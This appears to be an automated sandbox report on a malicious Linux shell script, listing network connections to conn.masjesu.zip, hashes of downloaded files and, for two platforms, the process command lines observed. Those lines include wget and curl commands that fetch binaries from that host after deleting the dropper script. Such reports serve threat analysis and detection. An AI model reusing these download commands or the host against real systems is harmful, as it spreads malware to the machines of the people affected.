| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
Files
/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe
| MD5 | e1732e70f015e99d14dff1eeeaec9966 |
| SHA1 | c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113 |
| SHA256 | 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e |
| SHA512 | 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7 |
/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu
| MD5 | 546071c6a6aeff34580b4d1a9b35a7c3 |
| SHA1 | dc2de298837a86d3bc86e8a328411229d9eccdb6 |
| SHA256 | 2d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12 |
| SHA512 | 207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-18 01:50
Reported
2024-10-18 01:52
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
149s
Max time network
131s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh
[/tmp/5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 151.101.193.91:443 | tcp | |
| GB | 89.187.167.4:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.62:443 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-18 01:50
Reported
2024-10-18 01:52
Platform
debian9-armhf-20240611-en
Max time kernel
150s
Max time network
3s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Processes
/tmp/5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh
[/tmp/5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |